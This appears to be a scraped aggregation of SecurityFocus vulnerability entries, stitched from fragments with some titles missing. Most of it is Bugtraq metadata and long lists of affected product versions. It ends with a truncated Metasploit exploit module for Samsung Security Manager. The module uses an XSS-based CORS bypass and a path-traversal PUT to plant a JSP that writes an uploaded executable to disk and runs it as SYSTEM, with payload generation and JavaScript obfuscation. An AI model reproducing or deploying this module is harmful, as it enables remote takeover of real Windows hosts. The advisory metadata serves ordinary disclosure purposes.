Execution

libTIFF CVE-2016-8331 Type Confusion Remote Code Execution Vulnerability

Bugtraq ID: 93898
Class: Boundary Condition Error
CVE: CVE-2016-8331
Remote: Yes
Local: No
Published: Oct 25 2016 12:00AM
Updated: Nov 20 2016 12:03AM
Credit: Tyler Bohan and Cory Duplantis.
Vulnerable: LibTIFF LibTIFF 4.0.6
Not Vulnerable:


SecurityFocus Vulnerabilities

Veritas NetBackup Appliance CVE-2016-7399 Arbitrary Command Execution Vulnerability

Bugtraq ID: 94384
Class: Input Validation Error
CVE: CVE-2016-7399
Remote: Yes
Local: No
Published: Nov 17 2016 12:00AM
Updated: Nov 17 2016 12:00AM
Credit: Matthew Hall.
Vulnerable: Veritas NetBackup Appliance 2.7.2
Veritas NetBackup Appliance 2.7.1
Veritas NetBackup Appliance 2.6.1.2
Veritas NetBackup Appliance 2.6.1.0
Veritas NetBackup Appliance 2.6.0.4
Veritas NetBackup Appliance 2.6.0.0
Not Vulnerable:


SecurityFocus Vulnerabilities

Vulnerable: SuSE Linux Enterprise Server 11 SP2 LTSS
QEMU QEMU 0
IBM PowerKVM 2.1.1 SP3
IBM PowerKVM 2.1.1 Build 65.7
IBM PowerKVM 2.1.1 Build 65.6
IBM PowerKVM 2.1.1 Build 65.5
IBM PowerKVM 2.1.1 Build 65.4
IBM PowerKVM 2.1.1 build 57
IBM PowerKVM 3.1.0.2
IBM PowerKVM 3.1 SP2
IBM PowerKVM 3.1 SP1
IBM PowerKVM 3.1 Build 3
IBM PowerKVM 3.1 Build 2
IBM PowerKVM 3.1
IBM PowerKVM 2.1.1.3-65.10
IBM PowerKVM 2.1.1.3-65
IBM PowerKVM 2.1.1 SP2 (build 51)
IBM PowerKVM 2.1.1 Build 65.1
IBM PowerKVM 2.1.1 build 58
IBM PowerKVM 2.1
Gentoo Linux


SecurityFocus Vulnerabilities

Vulnerable: Xen Xen 4.6
Xen Xen 4.5.0
Xen Xen 4.4.1
Xen Xen 4.4.0
Xen Xen 4.3.1
Xen Xen 4.3.0
Redhat Enterprise Virtualization 0
Redhat Enterprise Linux Workstation 7
Redhat Enterprise Linux Virtualization 5 Server
Redhat Enterprise Linux Server EUS 7.2
Redhat Enterprise Linux Server AUS 7.2
Redhat Enterprise Linux Server 7
Redhat Enterprise Linux HPC Node EUS 7.2
Redhat Enterprise Linux HPC Node 7
Redhat Enterprise Linux Desktop Multi OS 5 client
Redhat Enterprise Linux Desktop 7
QEMU QEMU 0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle VM Server for x86 3.2
Oracle Enterprise Linux 5
HP Helion OpenStack 2.1.4
HP Helion OpenStack 2.1.2
HP Helion OpenStack 2.1
HP Helion OpenStack 2.0
Citrix XenServer 6.0.2 Common Criteria
Citrix XenServer 6.0.2
Citrix XenServer 6.5 Service Pack 1
Citrix XenServer 6.5
Citrix XenServer 6.2 Service Pack 1
Citrix XenServer 6.2
Citrix XenServer 6.1
Citrix XenServer 6.0


SecurityFocus Vulnerabilities

LibTIFF '_TIFFVGetField()' Function Arbitrary Command Execution Vulnerability

Bugtraq ID: 85953
Class: Boundary Condition Error
CVE: CVE-2016-3632
Remote: Yes
Local: No
Published: Apr 08 2016 12:00AM
Updated: Sep 14 2016 07:00PM
Credit: Kaixiang Zhang of the Cloud Security Team, Qihoo 360
Vulnerable: Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle Linux 7.0
Oracle Linux 6.0
LibTIFF LibTIFF 4.0.3
LibTIFF LibTIFF 4.0.2
LibTIFF LibTIFF 3.9.4
LibTIFF LibTIFF 3.9.3
LibTIFF LibTIFF 3.9.2
LibTIFF LibTIFF 3.9
LibTIFF LibTIFF 3.8.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.8.1
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.8
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.4
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.1
LibTIFF LibTIFF 3.7
+ Slackware Linux 10.0
+ Slackware Linux -current
LibTIFF LibTIFF 3.6.1
+ Gentoo Linux 1.4
+ Gentoo Linux
+ OpenPKG OpenPKG Current
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LibTIFF LibTIFF 3.6
LibTIFF LibTIFF 3.5.7
+ Redhat Fedora Core2
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
LibTIFF LibTIFF 3.5.6
LibTIFF LibTIFF 3.5.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
LibTIFF LibTIFF 3.5.4
LibTIFF LibTIFF 3.5.3
LibTIFF LibTIFF 3.5.2
LibTIFF LibTIFF 3.5.1
LibTIFF LibTIFF 3.4
LibTIFF LibTIFF 4.0.6
LibTIFF LibTIFF 4.0.5
LibTIFF LibTIFF 4.0.4
LibTIFF LibTIFF 4.0.1
LibTIFF LibTIFF 4.0
LibTIFF LibTIFF 3.9.5
LibTIFF LibTIFF 3.9.1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 2.3 Fix Pack 1
IBM SmartCloud Entry 2.3 Appliance fix pack 6
IBM SmartCloud Entry 2.3 Appliance fix pack 4
IBM SmartCloud Entry 2.2 Fix Pack 2
IBM SmartCloud Entry 2.2 Fix Pack 1
IBM SmartCloud Entry 2.2 Appliance fix pack 6
IBM SmartCloud Entry 2.2 Appliance fix pack 4
IBM SmartCloud Entry 2.2
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 2.4.0.4 Appliance Fi
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.4 Appliance Fi
IBM SmartCloud Entry 2.3.0
IBM SmartCloud Entry 2.2.0.4 Appliance Fi
IBM SmartCloud Entry 2.2.0.3 Appliance FP
Not Vulnerable:


SecurityFocus Vulnerabilities

Multiple VMware Workstation Products CVE-2016-7085 DLL Loading Remote Code Execution Vulnerability

Bugtraq ID: 92940
Class: Design Error
CVE: CVE-2016-7085
Remote: Yes
Local: No
Published: Sep 13 2016 12:00AM
Updated: Sep 13 2016 12:00AM
Credit: Stefan Kantha, Anand Bhat, and Himanshu Mehta.
Vulnerable: VMWare Workstation Pro 12.1.1
VMWare Workstation Pro 12.1
VMWare Workstation Player 12.1.1
VMWare Workstation Player 12.1
Not Vulnerable: VMWare Workstation Pro 12.5.0
VMWare Workstation Player 12.5


SecurityFocus Vulnerabilities

Vulnerable: Oracle Mysql 5.7.15
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.5.52
Oracle Mysql 5.5.49
Oracle Mysql 5.5.46
Oracle Mysql 5.5.45
Oracle Mysql 5.5.44
Oracle Mysql 5.5.43
Oracle Mysql 5.5.42
Oracle Mysql 5.5.41
Oracle Mysql 5.5.40
Oracle Mysql 5.5.39
Oracle Mysql 5.5.38
Oracle Mysql 5.5.37
Oracle Mysql 5.5.36
Oracle Mysql 5.5.35
Oracle Mysql 5.5.32
Oracle Mysql 5.5.31
Oracle Mysql 5.5.28
Oracle Mysql 5.5.27
Oracle Mysql 5.5.25
Oracle Mysql 5.5.24
Oracle Mysql 5.5.23
Oracle Mysql 5.5.22
Oracle Mysql 5.5.21
Oracle Mysql 5.5.20
Oracle Mysql 5.5.19
Oracle Mysql 5.5.18
Oracle Mysql 5.5.17
Oracle Mysql 5.5.16
Oracle Mysql 5.5.15
Oracle Mysql 5.5.14
Oracle Mysql 5.5.13
Oracle Mysql 5.5.12
Oracle Mysql 5.5.11
Oracle Mysql 5.5.10
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.5.48
Oracle Mysql 5.5.47
Oracle Mysql 5.5.34
Oracle Mysql 5.5.33
Oracle Mysql 5.5.30
Oracle Mysql 5.5.29
Oracle Mysql 5.5.26


SecurityFocus Vulnerabilities

Bugtraq ID: 89192
Class: Unknown
CVE: CVE-2016-0376
Remote: Yes
Local: No
Published: Apr 27 2016 12:00AM
Updated: Aug 16 2016 06:00PM
Credit: Adam Gowdiak of Security Explorations
Vulnerable: Redhat Enterprise Linux Workstation Supplementary 7
Redhat Enterprise Linux Workstation Supplementary 6
Redhat Enterprise Linux Supplementary 5 server
Redhat Enterprise Linux Server Supplementary EUS 6.7.z
Redhat Enterprise Linux Server Supplementary 7
Redhat Enterprise Linux Server Supplementary 6
Redhat Enterprise Linux HPC Node Supplementary 7
Redhat Enterprise Linux HPC Node Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 7
Redhat Enterprise Linux Desktop Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 5 client
IBM Vios 2.2
IBM Tivoli Composite Application Manager for Transactions 7.4
IBM Tivoli Composite Application Manager for Transactions 7.3.0
IBM Tivoli Application Dependency Discovery Manager 7.2.1 3
IBM Tivoli Application Dependency Discovery Manager 7.2.1 2
IBM Tivoli Application Dependency Discovery Manager 7.2.1 1
IBM Tivoli Application Dependency Discovery Manager 7.2.1
IBM Tivoli Application Dependency Discovery Manager 7.3.0.3
IBM Tivoli Application Dependency Discovery Manager 7.2.2.5
IBM Tivoli Application Dependency Discovery Manager 7.2.1.6
IBM Tivoli Application Dependency Discovery Manager 7.2.1.5
IBM Tivoli Application Dependency Discovery Manager 7.2.1.4
IBM Tivoli Application Dependency Discovery Manager 7.2.0.9
IBM Tivoli Application Dependency Discovery Manager 7.2.0.8
IBM Tivoli Application Dependency Discovery Manager 7.2.0.7
IBM Tivoli Application Dependency Discovery Manager 7.2.0.6
IBM Tivoli Application Dependency Discovery Manager 7.2.0.5
IBM Tivoli Application Dependency Discovery Manager 7.2.0.4
IBM Tivoli Application Dependency Discovery Manager 7.2.0.3
IBM Tivoli Application Dependency Discovery Manager 7.2.0.2
IBM Tivoli Application Dependency Discovery Manager 7.2.0.10
IBM Tivoli Application Dependency Discovery Manager 7.2.0.1
IBM Tivoli Application Dependency Discovery Manager 7.2.0
IBM Tivoli Access Manager for e-business 6.1.1
IBM Tivoli Access Manager for e-business 6.1
IBM Tivoli Access Manager for e-business 6.0
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 3.2.0.4 JRE Update 8
IBM SmartCloud Entry 3.2.0.3
IBM SmartCloud Entry 3.2.0.2
IBM SmartCloud Entry 3.2.0.1
IBM SmartCloud Entry 3.1.0.4 JRE Update 1
IBM SmartCloud Entry 3.1.0.3
IBM SmartCloud Entry 3.1.0.2
IBM SmartCloud Entry 3.1.0.1
IBM SmartCloud Entry 2.4.0.5 JRE Update 5
IBM SmartCloud Entry 2.4.0.3 Appliance FP
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.3 JRE Update 5
IBM SmartCloud Entry 2.3.0
IBM Security Access Manager for Web 8.0
IBM Security Access Manager for Web 7.0
IBM Security Access Manager for Mobile 8.0.0.3
IBM Security Access Manager for Mobile 8.0.0.2
IBM Security Access Manager for Mobile 8.0.0.1
IBM Security Access Manager for Mobile 8.0.0.0
IBM Security Access Manager 9.0.0.1
IBM Security Access Manager 9.0
IBM Rational Software Architect 9.1.2
IBM Rational Software Architect 8.5.5
IBM Rational Software Architect 8.5.1
IBM Rational Software Architect 9.5.0.1
IBM Rational Software Architect 9.5
IBM Rational Software Architect 9.1.2.1
IBM Rational Software Architect 9.1.1
IBM Rational Software Architect 9.1
IBM Rational Software Architect 9.0.0.1
IBM Rational Software Architect 9.0
IBM Rational Software Architect 8.5.5.4
IBM Rational Software Architect 8.5.5.3
IBM Rational Software Architect 8.5.5.2
IBM Rational Software Architect 8.5.5.1
IBM Rational Software Architect 8.5
IBM Rational Functional Tester 8.3 2
IBM Rational Functional Tester 8.6.0.7
IBM Rational Functional Tester 8.6.0.6
IBM Rational Functional Tester 8.6.0.5
IBM Rational Functional Tester 8.6.0.4
IBM Rational Functional Tester 8.6.0.3
IBM Rational Functional Tester 8.6.0.2
IBM Rational Functional Tester 8.6.0.1
IBM Rational Functional Tester 8.6
IBM Rational Functional Tester 8.5.1.3
IBM Rational Functional Tester 8.5.1.2
IBM Rational Functional Tester 8.5.1.1
IBM Rational Functional Tester 8.5.1
IBM Rational Functional Tester 8.5.0.1
IBM Rational Functional Tester 8.5
IBM Rational Functional Tester 8.3.0.1
IBM Rational Functional Tester 8.3
IBM Rational Developer for Power Systems Software 8.5.1
IBM Rational Developer for Power Systems Software 8.5
IBM Rational Developer for i 9.1.1
IBM Rational Developer for i 9.0 1
IBM Rational Developer for i 9.5.0.3
IBM Rational Developer for i 9.5.0.2
IBM Rational Developer for i 9.5.0.1
IBM Rational Developer for i 9.5
IBM Rational Developer for i 9.1.1.1
IBM Rational Developer for i 9.1
IBM Rational Developer for i 9.0.1
IBM Rational Developer for i 9.0
IBM Rational Developer for C/C++ 9.1.1
IBM Rational Developer for C/C++ 9.0.1
IBM Rational Developer for C/C++ 9.1.1.2
IBM Rational Developer for C/C++ 9.1
IBM Rational Developer for C/C++ 9.0.0.1
IBM Rational Developer for C/C++ 9.0
IBM Rational Developer for AIX and Linux 9.1.1
IBM Rational Developer for AIX and Linux 9.0 1
IBM Rational Developer for AIX and Linux 9.1.1.2
IBM Rational Developer for AIX and Linux 9.1.1.1
IBM Rational Developer for AIX and Linux 9.1
IBM Rational Developer for AIX and Linux 9.0.1
IBM Rational Developer for AIX and Linux 9.0
IBM Rational Developer for AIX and COBOL 9.1.1
IBM Rational Developer for AIX and COBOL 9.0.1
IBM Rational Developer for AIX and COBOL 9.1.1.2
IBM Rational Developer for AIX and COBOL 9.1
IBM Rational Developer for AIX and COBOL 9.0.0.1
IBM Rational Developer for AIX and COBOL 9.0
IBM QRadar 7.2
IBM QRadar 7.1
IBM OS Image for Red Hat 2.1.5.0
IBM OS Image for Red Hat 2.1.0.2
IBM OS Image for Red Hat 2.1.0.1
IBM OS Image for Red Hat 2.1.0.0
IBM OS Image for Red Hat 2.0.0.4
IBM OS Image for Red Hat 2.0.0.3
IBM OS Image for Red Hat 2.0.0.2
IBM OS Image for Red Hat 2.0.0.1
IBM OS Image for AIX 2.1.5.0
IBM OS Image for AIX 2.1.1.0
IBM OS Image for AIX 2.0.0.1
IBM OS Image for AIX 1.1.5.0
IBM Notes Standard Client 9.0.1 FP5 IF3
IBM Notes Standard Client 9.0.1
IBM Notes Standard Client 8.5.3 FP6IF10
IBM Notes Standard Client 8.5.3
IBM Notes Standard Client 8.5.2
IBM Notes Standard Client 8.5.1
IBM Notes Standard Client 9.0
IBM Notes Standard Client 8.5
IBM Java SDK 1.4.2
IBM Java SDK 8.0.1.10
IBM Java SDK 8.0.1.1
IBM Java SDK 8.0 SR2 FP10
IBM Java SDK 8.0
IBM Java SDK 8 SR2 FP10
IBM Java SDK 8 SR1-FP1
IBM Java SDK 8 SR1
IBM Java SDK 8 SR 2
IBM Java SDK 8 SR 1 FP 10
IBM Java SDK 8 SR 1 FP 1
IBM Java SDK 7R1 SR3-FP1
IBM Java SDK 7R1 SR3 FP30
IBM Java SDK 7R1 SR3
IBM Java SDK 7R1 SR2-FP10
IBM Java SDK 7R1 SR2
IBM Java SDK 7R1 SR1
IBM Java SDK 7R1 SR 3 FP 20
IBM Java SDK 7R1 SR 3 FP 10
IBM Java SDK 7R1 SR 3 FP 1
IBM Java SDK 7.1.3.30
IBM Java SDK 7.1.3.20
IBM Java SDK 7.1.3.10
IBM Java SDK 7.1.3.1
IBM Java SDK 7.1.2.10
IBM Java SDK 7.1.1.0 ~~Technology
IBM Java SDK 7.1.0.0 ~~Technology
IBM Java SDK 7.1 SR3 FP30
IBM Java SDK 7.1
IBM Java SDK 7.0.9.30
IBM Java SDK 7.0.9.20
IBM Java SDK 7.0.9.10
IBM Java SDK 7.0.9.1
IBM Java SDK 7.0.8.10
IBM Java SDK 7.0.7.0 ~~Technology
IBM Java SDK 7.0.6.1 ~~Technology
IBM Java SDK 7.0.6.0 ~~Technology
IBM Java SDK 7.0.5.0 ~~Technology
IBM Java SDK 7.0.4.2 ~~Technology
IBM Java SDK 7.0.4.1 ~~Technology
IBM Java SDK 7.0.4.0 ~~Technology
IBM Java SDK 7.0.3.0 ~~Technology
IBM Java SDK 7.0.2.0 ~~Technology
IBM Java SDK 7.0.1.0 ~~Technology
IBM Java SDK 7.0.0.0 ~~Technology
IBM Java SDK 7.0 SR8-FP10
IBM Java SDK 7.0
IBM Java SDK 7 SR9-FP1
IBM Java SDK 7 SR9 FP30
IBM Java SDK 7 SR9
IBM Java SDK 7 SR8-FP10
IBM Java SDK 7 SR8
IBM Java SDK 7 SR7
IBM Java SDK 7 SR5
IBM Java SDK 7 SR4-FP2
IBM Java SDK 7 SR4-FP1
IBM Java SDK 7 SR4
IBM Java SDK 7 SR3
IBM Java SDK 7 SR2
IBM Java SDK 7 SR1
IBM Java SDK 7 SR 9 FP 20
IBM Java SDK 7 SR 9 FP 10
IBM Java SDK 7 SR 9 FP 1
IBM Java SDK 7 R1
IBM Java SDK 7
IBM Java SDK 6R1 SR8-FP5
IBM Java SDK 6R1 SR8-FP4
IBM Java SDK 6R1 SR8-FP3
IBM Java SDK 6R1 SR8-FP2
IBM Java SDK 6R1 SR8 FP20
IBM Java SDK 6R1 SR8
IBM Java SDK 6R1 SR 8 FP 7
IBM Java SDK 6R1 SR 8 FP 5
IBM Java SDK 6R1 SR 8 FP 15
IBM Java SDK 6.1.8.7
IBM Java SDK 6.1.8.5
IBM Java SDK 6.1.8.4
IBM Java SDK 6.1.8.3
IBM Java SDK 6.1.8.20
IBM Java SDK 6.1.8.2
IBM Java SDK 6.1.8.15
IBM Java SDK 6.0.9.2 ~~Technology
IBM Java SDK 6.0.9.1 ~~Technology
IBM Java SDK 6.0.9.0 ~~Technology
IBM Java SDK 6.0.8.1 ~~Technology
IBM Java SDK 6.0.8.0 ~~Technology
IBM Java SDK 6.0.7.0 ~~Technology
IBM Java SDK 6.0.6.0 ~~Technology
IBM Java SDK 6.0.5.0 ~~Technology
IBM Java SDK 6.0.4.0 ~~Technology
IBM Java SDK 6.0.3.0 ~~Technology
IBM Java SDK 6.0.2.0 ~~Technology
IBM Java SDK 6.0.16.7
IBM Java SDK 6.0.16.5
IBM Java SDK 6.0.16.4
IBM Java SDK 6.0.16.3
IBM Java SDK 6.0.16.20
IBM Java SDK 6.0.16.2
IBM Java SDK 6.0.16.0 ~~Technolog
IBM Java SDK 6.0.15.1 ~~Technolog
IBM Java SDK 6.0.15.0 ~~Technolog
IBM Java SDK 6.0.14.0 ~~Technolog
IBM Java SDK 6.0.13.2 ~~Technolog
IBM Java SDK 6.0.13.1 ~~Technolog
IBM Java SDK 6.0.13.0 ~~Technolog
IBM Java SDK 6.0.12.0 ~~Technolog
IBM Java SDK 6.0.11.0 ~~Technolog
IBM Java SDK 6.0.10.1 ~~Technolog
IBM Java SDK 6.0.10.0 ~~Technolog
IBM Java SDK 6.0.1.0 ~~Technology
IBM Java SDK 6.0.1 SR6
IBM Java SDK 6.0.1 SR5-FP2
IBM Java SDK 6.0.1 SR5
IBM Java SDK 6.0.1 SR4
IBM Java SDK 6.0.1 SR3
IBM Java SDK 6.0.0.0 ~~Technology
IBM Java SDK 6.0 SR16-FP3
IBM Java SDK 6 SR16-FP5
IBM Java SDK 6 SR16-FP4
IBM Java SDK 6 SR16-FP3
IBM Java SDK 6 SR16-FP2
IBM Java SDK 6 SR16 FP20
IBM Java SDK 6 SR16
IBM Java SDK 6 SR14
IBM Java SDK 6 SR13-FP2
IBM Java SDK 6 SR13-FP1
IBM Java SDK 6 SR13
IBM Java SDK 6 SR12
IBM Java SDK 6 SR11
IBM Java SDK 6 SR10
IBM Java SDK 6 SR 16 FP 7
IBM Java SDK 6 SR 16 FP 5
IBM Java SDK 6 SR 16 FP 15
IBM Java SDK 6
IBM Java SDK 5
IBM Java 7 SR5
IBM InfoSphere Streams 4.1.1.0
IBM InfoSphere Streams 4.0.1.1
IBM InfoSphere Streams 3.2.1.4
IBM InfoSphere Streams 3.1.0.8
IBM InfoSphere Streams 3.0.0.6
IBM InfoSphere Streams 2.0.0.4
IBM InfoSphere Streams 1.2.1.0
IBM Image Construction and Composition Tool 2.3.2.0
IBM Image Construction and Composition Tool 2.3.1.0
IBM ILOG Optimization Decision Manager Enterprise 3.7.0.2
IBM ILOG Optimization Decision Manager Enterprise 3.6
IBM ILOG Optimization Decision Manager Enterprise 3.5
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM i 6.1
IBM Explorer for z/OS 3.0
IBM eDiscovery Analyzer 2.2.2
IBM eDiscovery Analyzer 2.2.1
IBM eDiscovery Analyzer 2.2
IBM Decision Optimization Center 3.8.0.2
IBM Decision Optimization Center 3.8
IBM CPLEX Optimization Studio 12.6.3
IBM CPLEX Optimization Studio 12.6.1
IBM CPLEX Optimization Studio 12.5.1
IBM CPLEX Optimization Studio 12.6.0.1
IBM CPLEX Optimization Studio 12.6
IBM CPLEX Optimization Studio 12.5.0.1
IBM CPLEX Optimization Studio 12.5
IBM CPLEX Optimization Studio 12.4.0.1
IBM CPLEX Optimization Studio 12.4
IBM CPLEX Enterprise Server 12.6.3
IBM CPLEX Enterprise Server 12.6.1
IBM CPLEX Enterprise Server 12.5.1
IBM CPLEX Enterprise Server 12.6.0.1
IBM CPLEX Enterprise Server 12.6
IBM CPLEX Enterprise Server 12.5.0.1
IBM CPLEX Enterprise Server 12.5
IBM CPLEX Enterprise Server 12.4.0.1
IBM CPLEX Enterprise Server 12.4
IBM Cloud Manager with Openstack 4.3
IBM Cloud Manager with Openstack 4.2
IBM Cloud Manager with Openstack 4.1
IBM Cloud Manager with Openstack 4.3.0.6
IBM Cloud Manager with Openstack 4.3.0.4
IBM Cloud Manager with Openstack 4.3.0.3
IBM Cloud Manager with Openstack 4.3.0.2
IBM Cloud Manager with Openstack 4.3.0.1
IBM Cloud Manager with Openstack 4.2.0.3 Interix Fix
IBM Cloud Manager with Openstack 4.2.0.2
IBM Cloud Manager with Openstack 4.2.0.1
IBM Cloud Manager with Openstack 4.1.0.5 Interim Fix
IBM Cloud Manager with Openstack 4.1.0.4
IBM Cloud Manager with Openstack 4.1.0.3
IBM Cloud Manager with Openstack 4.1.0.2
IBM Cloud Manager with Openstack 4.1.0.1
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
Not Vulnerable: IBM Security Access Manager for Web 8.0.1.4
IBM Security Access Manager for Mobile 8.0.1.4
IBM Security Access Manager 9.0.1.0
IBM Notes Standard Client 9.0.1 FP6
IBM Java SDK 8 SR 3
IBM Java SDK 8 SR 2 FP 14
IBM Java SDK 7R1 SR 3 FP 40
IBM Java SDK 7 SR 9 FP 40
IBM Java SDK 7 SR 9 FP 32
IBM Java SDK 6R1 SR 8 FP 25
IBM Java SDK 6R1 SR 8 FP 21
IBM Java SDK 6 SR 16 FP 25
IBM Java SDK 6 SR 16 FP 22


SecurityFocus Vulnerabilities

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper

def initialize(info=)
super(update_info(info,
'Name' => "Samsung Security Manager 1.5 ActiveMQ Broker Service PUT Method Remote Code Execution",
'Description' => %q
This is an exploit against Samsung Security Manager that bypasses the patch in
CVE-2015-3435 by exploiting the vulnerability against the client side. This exploit has
been tested successfully against IE, FireFox and Chrome by abusing a GET request XSS to
bypass CORS and reach the vulnerable PUT. Finally, a traversal is used in the PUT request
to upload the code just where we want it and gain Remote Code Execution as SYSTEM.
,
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me[at]offensive-security.com>', # vuln + module
],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
# tested on 1.32, 1.4 & 1.5
[ 'Samsung Security Manager 1.32, 1.4 & 1.5 Universal', ],
],
'DisclosureDate' => "Aug 05 2016",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end

# this is because String.fromCharCode has a max of 65535 func args
# thanks to sinn3r for his help with the Array->String conversion
def encode_js(string)
i = 0
encoded_0 = []
encoded_1 = []
string.each_byte do |c|
if i > 65534
encoded_1 << c
else
encoded_0 << c
end
i += 1
end
if i > 65534
return encoded_0 * ",", encoded_1 * ","
else
return encoded_0 * ","
end
end

# tested on Firefox v46.0.1 (latest)
# tested on Chrome v50.0.2661.102 (latest release)
# tested on IE v11.0.9600.18314 (latest)
def on_request_uri(cli, request)

js_name = rand_text_alpha(rand(10)+5) + '.js'

payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name

# we deliver the JavaScript code that does the work for us
if (request.uri.match(/.js/))
return if ((p = regenerate_payload(cli)) == nil)

# dont exploit again otherwise we get a zillion shells
return if session_created? or @exploited

jsp_name = rand_text_alpha(rand(10)+5) + '.jsp'
exe_name = rand_text_alpha(rand(10)+5) + '.exe'

# clean just the jsp, because the exe dropper will be in use
register_files_for_cleanup("../../webapps/admin/#jsp_name")

# our jsp upload, ensuring native code execution
jsp = %Q|<%@ page import="java.io.*" %>
<%
ByteArrayOutputStream buf = new ByteArrayOutputStream();
BufferedReader reader = request.getReader();
int tmp;
while ((tmp = reader.read()) != -1) buf.write(tmp);
FileOutputStream fostream = new FileOutputStream("#exe_name");
buf.writeTo(fostream);
fostream.close();
Runtime.getRuntime().exec("#exe_name");
%>|

# encode the payloads
encoded_exe = encode_js(generate_payload_exe(code: payload.encoded))
encoded_jsp = encode_js(jsp)

# targets
jsp_uri = "http://localhost:8161/fileserver/..%5c%5cadmin%5c%5c#jsp_name"
upload_uri = "http://localhost:8161/admin/#jsp_name"

# this code does the PUT, then uploads/exec native code and then cleans the XSS out :->
js_content = %Q|

function do_put(uri, file_data)
var file_size = file_data.length;
var xhr = new XMLHttpRequest();
